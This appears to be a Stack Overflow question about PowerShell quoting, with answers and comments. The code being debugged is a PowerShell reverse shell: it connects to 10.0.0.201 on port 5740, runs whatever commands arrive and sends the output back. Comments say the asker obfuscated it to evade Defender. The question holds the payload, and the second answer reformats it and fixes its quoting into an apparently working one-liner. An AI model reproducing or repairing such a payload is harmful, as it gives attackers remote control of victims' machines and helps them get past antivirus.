# Powershell not accepting normal quotation marks

Tags: powershell, command-line-interface, escaping, quoting

I've been pulling my hair out all day because of this issue.

I'm working on a powershell one-liner and Powershell is being picky with what quotation mark I use. `“` vs `"`, with powershell requiring the former.

Ultimately, the big issue I'm having is that the powershell command won't work if I use the normal quotation marks. Below is the command, followed by the error that is occuring. If I use the weird quotation mark (instead of all of the normal double quotation marks) the command will work fine. It requires this weird quotation mark. Does anyone know what is happening here? Theoretically they should both work, but they definitely do not. My use case prevents me from being able to type the weird quotation mark.

```
powershell 'Set-Variable -Value (New-Object System.Net.Sockets.TCPClient("[10.0.0.201](https://10.0.0.201)",5740)) -    Name client;Set-Variable -Value ($client.GetStream()) -Name stream;\[byte\[\]\]$bytes = 0..65535|%{0};while((Set-Variable -Value ($[stream.Read](https://stream.Read)($bytes, 0, $bytes.Length)) -Name i) -ne 0){;Set-Variable -Value ((New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)) -Name data;Set-Variable -Value (iex $data 2>&1 | Out-String ) -Name sendback;Set-Variable -Value ($sendback + "PS " + (pwd).Path + "> ") -Name sendback2;Set-Variable -Name sendbyte -Value ((\[text.encoding\]::ASCII).GetBytes($sendback2));$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
```

The error:

```
At line:1 char:468

\+ ...  Out-String ) -Name sendback;Set-Variable -Value ($sendback + PS  + ( ...

\+                                                                  \~

You must provide a value expression following the '+' operator.

At line:1 char:469

\+ ... t-String ) -Name sendback;Set-Variable -Value ($sendback + PS  + (pwd ...

\+                                                                \~\~

Unexpected token 'PS' in expression or statement.

At line:1 char:468

\+ ...  Out-String ) -Name sendback;Set-Variable -Value ($sendback + PS  + ( ...

\+                                                                  \~

Missing closing ')' in expression.

At line:1 char:489

\+ ... endback;Set-Variable -Value ($sendback + PS  + (pwd).Path + > ) -Name ...

\+                                                                  \~

Missing file specification after redirection operator.

At line:1 char:262

\+ ... lue ($[stream.Read](https://stream.Read)($bytes, 0, $bytes.Length)) -Name i) -ne 0){;Set-Var ...

\+                                                                 \~

Missing closing '}' in statement block or type definition.

At line:1 char:490

\+ ... dback;Set-Variable -Value ($sendback + PS  + (pwd).Path + > ) -Name s ...

\+                                                                 \~

Unexpected token ')' in expression or statement.

At line:1 char:650

\+ ... ;$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client ...

\+                                                                 \~

Unexpected token '}' in expression or statement.

\+ CategoryInfo          : ParserError: (:) \[\], ParentContainsErrorRecordException

\+ FullyQualifiedErrorId : ExpectedValueExpression
```

Comment: The variables with dollar signs are not recognized with single quotes.  The only solution is  to build you string in pieces.  So I would create a variable $URL = `"""[10.0.0.201](https://10.0.0.201)"""`,  The put entire string in double quotes and use the variable $URL.

Comment: What you are showing as your sample code, is not a genuine one-liner. It is multiple commands on one line, as per your use of the ```;``` separator. A true one-liner is an uninterrupted pipe-lined command, no ```;``` should be required. What you have here is a very long one-line script, which simply makes it hard to read, debug, troubleshoot, and maintain as you have discovered.  You have more than just quoting issues in this code. You have several syntax errors. Write this as a script, then decide if it should be joined on one line, though I'd not recommend it.

Comment: Doublequotes are automatically taken off on the commandline.  See also "Start-Process with PowerShell.exe exhibits different behavior with embedded single quotes and double quotes" https://stackoverflow.com/questions/61109118/start-process-with-powershell-exe-exhibits-different-behavior-with-embedded-sing

Comment: To provide context, quoting from your Reddit cross-post, where you say about your code: "**It was generated by `Invoke-Obfuscation`. It's meant to be super round-about to avoid being detected by Defender**. And its successful at that."

Comment: [Link to the Reddit cross-post](https://www.reddit.com/r/PowerShell/comments/zjig4l/comment/izvgra1/?utm_source=share&utm_medium=web2x&context=3).

Answer (score 0, accepted):

**Update**:

[Your Reddit cross-post](https://www.reddit.com/r/PowerShell/comments/zjig4l/powershell_not_accepting_normal_quotation_marks/) reveals that **you're trying call the PowerShell CLI *from inside PowerShell***:

- There is **normally *no* good reason to do so**, but **if you do need it** (e.g. when you need to call *Windows PowerShell* from *PowerShell (Core) 7+*), **pass your commands *inside a script block* (`{ ... }`)**, which avoids the quoting headaches and also enables support for (limited) type fidelity (not just *strings*) - see [this answer](https://stackoverflow.com/a/74228152/45375).

  - Obfuscated PowerShell one-liners are sometimes used for *nefarious* purposes, which, needless to say, should not be condoned.
- In *string*-based CLI calls, which is what you attempted, double quotes require *escaping* as `\"` in order to be considered part of the PowerShell command to execute - see [this answer](https://stackoverflow.com/a/61124361/45375) for an explanation.
- When you used "Unicode" (non-ASCII) double quotes such as `“`, that escaping need went away, for the reasons explained in the bottom section. However, this should *not* be relied on.

  - On a general note: If you use non-ASCII *literals* such as `“` in your script, you must ensure that PowerShell interprets the script file's character encoding correctly, which for UTF-8 files notably requires them to *have a BOM* in *Windows PowerShell* - see [this answer](https://stackoverflow.com/a/54790355/45375).

---

The **following** discusses **calling the PowerShell CLI *from `cmd.exe`* / from *outside* PowerShell in general**.

---

**tl;dr**

- Do *not* try to use non-ASCII-range quotation marks such as `“` and `”` (see the bottom section for why).
- Instead, use *normal* (ASCII-range) double quotes (`"`) and *escape them as* `\"`
- Never use `'...'` to enclose your PowerShell commands passed to the PowerShell CLI (on Windows, from outside PowerShell), unless your intent is to create a *string literal* instead of executing a command.

---

The keys to making your call to [`powershell.exe`](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_exe), the Windows PowerShell CLI, work as intended *from `cmd.exe`* / *outside PowerShell*<sup>[1]</sup> are:

- **Do *not* use overall `'...'` quoting** (single quoting), because PowerShell will interpret the entire argument as a *verbatim string* rather than as a *command*.

  - It's best to use overall `"..."` quoting (see below).
- **Do *not* use `\` as the escape character - *except* to escape `"` characters** (see below).

  - Not only does `\` *not* function as a general-purpose escape character (neither in PowerShell nor in `cmd.exe`), `[` and `]` do *not* require escaping, so that, for instance, `\[byte\[\]\]` should just be `[byte[]]`.
  - PowerShell's [escape character](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_Special_Characters) is `` ` ``, the so-called backtick, and `cmd.exe`'s escape character - in *unquoted* arguments only - is `^`.
- **`"` characters that you want to be part of the PowerShell command to execute must be *escaped as* `\"`**

  - Escaping `"` characters is a requirement whether or not you're using overall `"..."` quoting, but *without* the latter it is *only* `\"` that works - see [this answer](https://stackoverflow.com/a/61124361/45375), which also explains *why* this escaping is necessary.
  - *With* overall `"..."` quoting, which is generally preferable, because `cmd.exe` then (mostly) does *not* interpret the content, `\"` works too, but there are **still edge cases where misinterpretation by `cmd.exe` can occur**, in which case an  *alternative* form of `"`-escaping is the solution: This alternative form is edition-specific, unfortunately: **`"^""..."^""` (sic) in *Windows PowerShell***, **`""...""` in *PowerShell (Core) 7+*** - see [this answer](https://stackoverflow.com/a/49060341/45375) for details, including an additional workaround required in Windows PowerShell in `for /f` loops.
- **When calling from `cmd.exe` / a batch file, avoid use of `%`**, unless you're trying to reference an environment variable `cmd.exe`-style, e.g. `%OS%`:

  - From batch files, `%` chars. you want to *pass through* to PowerShell, must be escaped as `%%`
  - In an *interactive* `cmd.exe` session, `%` cannot be escaped at all, and `%%` would be passed *as is*.
  - Therefore, to avoid commands from *breaking situationally* - depending on whether they're called from a batch file or from an interactive session - avoid `%`, if possible; here you can use `foreach` as an alternative to use of `%` as an alias of the [`ForEach-Object`](https://learn.microsoft.com/powershell/module/microsoft.powershell.core/foreach-object) cmdlet (of course, you can use the full cmdlet name too).

Here's a simplified command that implements all the tips above:

```bash
:: From cmd.exe / a batch file
:: Note the overall "..." quoting, use of \" for embedded double quotes
:: and use of foreach instead of %
powershell "Write-Output \"hello, world\" 2>&1 | foreach { \"[$_]\" }"
```

You should be able to fix your command accordingly (which, as currently shown in the question, has additional problems, unrelated to quoting and escaping).

---

**As for using *non-ASCII* ("Unicode") double quotes:**

- PowerShell-*internally*, it is allowed to substitute non-ASCII-range punctuation for their ASCII-range equivalents:

  - As you've discovered `“` (LEFT DOUBLE QUOTATION MARK, [`U+201C`](http://www.fileformat.info/info/unicode/char/201c)) and `”` (RIGHT DOUBLE QUOTATION MARK, [`U+201D`](http://www.fileformat.info/info/unicode/char/201d)) can be used in lieu of a pair of regular double quotes (`"`)
  - [This answer](https://stackoverflow.com/a/55053609/45375) provides an overview of all substitutions that are supported.
- By contrast, **on the PowerShell CLI's *command line***, it is **only the normal, ASCII-range double quotes** (**`"`** (QUOTATION MARK, [`U+0022`](http://www.fileformat.info/info/unicode/char/22))) that **have *syntactic function***, so that the non-ASCII-range `“` and `”` characters are *passed through* as part of the PowerShell command to execute.

That is, the use of the non-ASCII-range `“` and `”` characters effectively saves you from the need to *escape* them - both in unquoted tokens and inside normal `"..."`

However, this behavior is both obscure and visually subtle and should *not* be relied upon: instead, **use normal double quotes consistently and escape pass-through ones  as `\"`**, as discussed above.

As an aside: Regular console windows (`conhost.exe`) won't even allow you to paste the non-ASCII-range double quotes: they are converted to normal ones. You can, however, paste them in Windows Terminal and in the Windows Run dialog (<kbd>WinKey-R</kbd>).

---

<sup>[1] From *inside* PowerShell, there's rarely a need to call the PowerShell CLI; if needed, the best way to do so is by passing the commands *as a script block* (`{ ... }`) - see [this answer](https://stackoverflow.com/a/74228152/45375).</sup>

Comment: I think he's purposefully obfuscating his code.  See the same post on reddit.  https://www.reddit.com/r/PowerShell/comments/zjig4l/powershell_not_accepting_normal_quotation_marks/

Comment: "It was generated by Invoke-Obfuscation. It's meant to be super round-about to avoid being detected by Defender. And its successful at that. When I use the weird quotation marks it runs fine."

Answer (score 1):

As per my comment. Open up any PowerShell Editor to look at your code to see where you are going wrong, as the editors will highlight issues, well before you make a run attempt.

This is what you really have:

```
Set-Variable -Value (New-Object System.Net.Sockets.TCPClient("[10.0.0.201](https://10.0.0.201)", 5740)) -Name client

Set-Variable -Value ($client.GetStream()) -Name stream\[byte\[\]\]$bytes = 0..65535 | 
ForEach-Object{0}

while((Set-Variable -Value ($[stream.Read](https://stream.Read)($bytes, 0, $bytes.Length)) -Name i) -ne 0)
{
    Set-Variable -Value ((New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)) -Name data

    Set-Variable -Value (Invoke-Expression $data 2>&1 | Out-String ) -Name sendback

    Set-Variable -Value ($sendback + "PS " + (Get-Location).Path + "> ") -Name sendback2

    Set-Variable -Name sendbyte -Value ((\[text.encoding\]::ASCII).GetBytes($sendback2))

    $stream.Write($sendbyte, 0, $sendbyte.Length)

    $stream.Flush()
}
$client.Close()
```

I took out the aliases because aliases as a rule shown not to be used in production scripts. See the docs on the topic. Aliases are fine for throw-away code and quick CLI stuff.

Unless you are expanding variables or other specific formatting needs, then use the single quote for simple strings. Especially if you are putting this sort of stuff on one line, to avoid unnecessary quoting gymnastics.

So, refactoring a bit should allow this to work.

```
Set-Variable -Value (New-Object System.Net.Sockets.TCPClient('[10.0.0.201](https://10.0.0.201)', 5740)) -Name client

Set-Variable -Value ($client.GetStream()) -Name stream\[byte\[\]\]$bytes = 0..65535 | 
ForEach-Object{0}

while((Set-Variable -Value ($[stream.Read](https://stream.Read)($bytes, 0, $bytes.Length)) -Name i) -ne 0)
{
    Set-Variable -Value ((New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)) -Name data

    Set-Variable -Value (Invoke-Expression $data 2>&1 | Out-String ) -Name sendback

    Set-Variable -Value (("$sendback PS $((Get-Location).Path) > ")) -Name sendback2

    Set-Variable -Name sendbyte -Value ((\[text.encoding\]::ASCII).GetBytes($sendback2))

    $stream.Write($sendbyte, 0, $sendbyte.Length)

    $stream.Flush()
}
$client.Close()
```

Putting this all on one line and running this via cmd.exe calling powershell.exe could look like this.

```
powershell -Command {Set-Variable -Value (New-Object System.Net.Sockets.TCPClient('[10.0.0.201](https://10.0.0.201)', 5740)) -Name client;Set-Variable -Value ($client.GetStream()) -Name stream\[byte\[\]\]$bytes = 0..65535 | ForEach-Object{0};while((Set-Variable -Value ($[stream.Read](https://stream.Read)($bytes, 0, $bytes.Length)) -Name i) -ne 0){Set-Variable -Value ((New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)) -Name data;Set-Variable -Value (Invoke-Expression $data 2>&1 | Out-String ) -Name sendback;Set-Variable -Value (("$sendback PS $((Get-Location).Path) > ")) -Name sendback2;Set-Variable -Name sendbyte -Value ((\[text.encoding\]::ASCII).GetBytes($sendback2));$stream.Write($sendbyte, 0, $sendbyte.Length);$stream.Flush();};$client.Close()}
```

Yet, only you can test this as none of us here would have the same environment as you of course.

```
PowerShell[.exe] [-PSConsoleFile <file> | -Version <version>]
    [-NoLogo] [-NoExit] [-Sta] [-Mta] [-NoProfile] [-NonInteractive]
    [-InputFormat {Text | XML}] [-OutputFormat {Text | XML}]
    [-WindowStyle <style>] [-EncodedCommand <Base64EncodedCommand>]
    [-ConfigurationName <string>]
    [-File <filePath> <args>] [-ExecutionPolicy <ExecutionPolicy>]
    [-Command { - | <script-block> [-args <arg-array>]
                  | <string> [<CommandParameters>] } ]

PowerShell[.exe] -Help | -? | /?

...

EXAMPLES
    PowerShell -PSConsoleFile SqlSnapIn.Psc1
    PowerShell -version 2.0 -NoLogo -InputFormat text -OutputFormat XML
    PowerShell -ConfigurationName AdminRoles
    PowerShell -Command {Get-EventLog -LogName security}
    PowerShell -Command "& {Get-EventLog -LogName security}"

    # To use the -EncodedCommand parameter:
    $command = 'dir "c:\program files" '
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
    $encodedCommand = [Convert]::ToBase64String($bytes)
    powershell.exe -encodedCommand $encodedCommand
```

Comment: @js2010 points out that the code is up to no good - please see his comments on my answer. Therefore, it may be better _not_ to spell out the solution in your answer.